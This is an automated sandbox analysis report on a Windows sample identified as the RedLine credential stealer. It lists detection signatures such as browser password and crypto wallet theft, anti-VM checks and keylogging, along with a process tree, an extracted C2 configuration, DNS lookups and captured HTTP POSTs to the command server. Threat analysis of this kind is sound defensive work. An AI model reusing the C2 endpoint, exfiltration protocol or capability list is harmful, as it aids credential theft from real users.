Loading ...

Play interactive tourEdit tour

Windows Analysis Report kS2dqbsDwD

Overview

General Information

Sample Name:kS2dqbsDwD (renamed file extension from none to exe)
Analysis ID:452457
MD5:888ab99280a081717ec5c5749266d1bd
SHA1:3a071aeadd42c1232ff2878d2adf7f1e4a629180
SHA256:e726f2014db779e3605f60499f84676ceb45160c6d092bedfa115f7e09d693e8
Tags:exetrojan
Infos:

Most interesting Screenshot:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected RedLine Stealer
Yara detected RedLine Stealer
.NET source code contains potential unpacker
.NET source code contains very large strings
May check the online IP address of the machine
Performs DNS queries to domains with low reputation
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample or dropped binary is a compiled AutoHotkey binary
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Connects to a URL shortener service
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • kS2dqbsDwD.exe (PID: 5492 cmdline: 'C:\Users\user\Desktop\kS2dqbsDwD.exe' MD5: 888AB99280A081717EC5C5749266D1BD)
    • 325.exe (PID: 4796 cmdline: C:\Users\user\AppData\Roaming\325.exe 325 MD5: 523AC177BFB4FB64A20B60FC0CE3E0E3)
      • 325.exe (PID: 1784 cmdline: {path} MD5: 523AC177BFB4FB64A20B60FC0CE3E0E3)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["yspasenana.xyz:80"], "Bot Id": "world"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000002.00000002.306874811.0000000003A20000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          Process Memory Space: 325.exe PID: 4796JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            Process Memory Space: 325.exe PID: 1784JoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 2 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              2.2.325.exe.3b45a60.3.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                14.2.325.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  2.2.325.exe.3b45a60.3.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security

                    Sigma Overview

                    No Sigma rule has matched

                    Jbx Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: 14.2.325.exe.400000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["yspasenana.xyz:80"], "Bot Id": "world"}
                    Multi AV Scanner detection for dropped fileShow sources
                    Source: C:\Users\user\AppData\Roaming\325.exeReversingLabs: Detection: 33%
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: kS2dqbsDwD.exeVirustotal: Detection: 20%Perma Link
                    Source: kS2dqbsDwD.exeReversingLabs: Detection: 13%
                    Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.3:49711 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.25.234.53:443 -> 192.168.2.3:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 52.217.201.169:443 -> 192.168.2.3:49715 version: TLS 1.2
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140087A90 GetFileAttributesW,FindFirstFileW,FindClose,0_2_0000000140087A90
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140087B90 FindFirstFileW,FindClose,FindFirstFileW,FindClose,0_2_0000000140087B90
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D080 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_000000014004D080
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140062320 GetFileAttributesW,FindFirstFileW,FindClose,0_2_0000000140062320
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400C2390 FindFirstFileW,0_2_00000001400C2390
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D405 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_000000014004D405
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D40F SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_000000014004D40F
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D419 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_000000014004D419
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D423 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_000000014004D423
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D44D SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_000000014004D44D
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D478 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_000000014004D478
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D4A0 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_000000014004D4A0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D4BE SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_000000014004D4BE
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D4DF SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_000000014004D4DF
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D500 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_000000014004D500
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D792 FindFirstFileW,GetLastError,0_2_000000014004D792
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D7E0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,0_2_000000014004D7E0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D990 SystemTimeToFileTime,LocalFileTimeToFileTime,GetLastError,GetSystemTimeAsFileTime,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,CreateFileW,GetLastError,SetFileTime,GetLastError,CloseHandle,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_000000014004D990
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140061A30 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,CopyFileW,GetLastError,FindNextFileW,FindClose,0_2_0000000140061A30
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004CAE0 SetLastError,DeleteFileW,GetLastError,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,DeleteFileW,GetLastError,FindNextFileW,FindClose,0_2_000000014004CAE0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140032DC0 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_0000000140032DC0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004DFA0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,0_2_000000014004DFA0

                    Networking:

                    barindex
                    May check the online IP address of the machineShow sources
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeDNS query: name: iplogger.org
                    Performs DNS queries to domains with low reputationShow sources
                    Source: C:\Users\user\AppData\Roaming\325.exeDNS query: yspasenana.xyz
                    Source: C:\Users\user\AppData\Roaming\325.exeDNS query: yspasenana.xyz
                    Source: C:\Users\user\AppData\Roaming\325.exeDNS query: yspasenana.xyz
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeDNS query: name: is.gd
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: yspasenana.xyzContent-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: yspasenana.xyzContent-Length: 1125491Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: yspasenana.xyzContent-Length: 1125483Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 104.192.141.1 104.192.141.1
                    Source: Joe Sandbox ViewIP Address: 104.25.234.53 104.25.234.53
                    Source: Joe Sandbox ViewASN Name: DE-FIRSTCOLOwwwfirst-colonetDE DE-FIRSTCOLOwwwfirst-colonetDE
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140060290 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetOpenUrlW,FreeLibrary,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,FreeLibrary,DeleteFileW,FreeLibrary,0_2_0000000140060290
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                    Source: unknownDNS traffic detected: queries for: iplogger.org
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: yspasenana.xyzContent-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: kS2dqbsDwD.exe, kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmpString found in binary or memory: http://ahkscript.org
                    Source: kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmpString found in binary or memory: http://ahkscript.orgCould
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.362916266.0000000000EDE000.00000004.00000020.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertBaltimoreCA-2G2.crt0
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: kS2dqbsDwD.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                    Source: kS2dqbsDwD.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.362916266.0000000000EDE000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertBaltimoreCA-2G2.crl0:
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.362868644.0000000000EAF000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
                    Source: 325.exe, 0000000E.00000002.362916266.0000000000EDE000.00000004.00000020.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertBaltimoreCA-2G2.crl0K
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
                    Source: kS2dqbsDwD.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                    Source: kS2dqbsDwD.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                    Source: 325.exe, 0000000E.00000003.361749064.0000000008E80000.00000004.00000001.sdmp, 325.exe, 0000000E.00000003.356337504.0000000008E71000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado/1
                    Source: 325.exe, 0000000E.00000003.361749064.0000000008E80000.00000004.00000001.sdmp, 325.exe, 0000000E.00000003.356337504.0000000008E71000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/g
                    Source: 325.exe, 0000000E.00000003.361749064.0000000008E80000.00000004.00000001.sdmp, 325.exe, 0000000E.00000003.356337504.0000000008E71000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cobj
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.362916266.0000000000EDE000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.362868644.0000000000EAF000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0K
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0R
                    Source: kS2dqbsDwD.exeString found in binary or memory: http://ocsp.sectigo.com0
                    Source: 325.exe, 0000000E.00000002.363663060.0000000002C48000.00000004.00000001.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363663060.0000000002C48000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363765245.0000000002CC8000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: 325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363663060.0000000002C48000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363765245.0000000002CC8000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363513965.0000000002BAC000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: 325.exe, 0000000E.00000002.363745282.0000000002CC3000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363765245.0000000002CC8000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363553809.0000000002BDB000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: 325.exe, 0000000E.00000002.363824201.0000000002CDE000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
                    Source: 325.exe, 0000000E.00000002.363824201.0000000002CDE000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
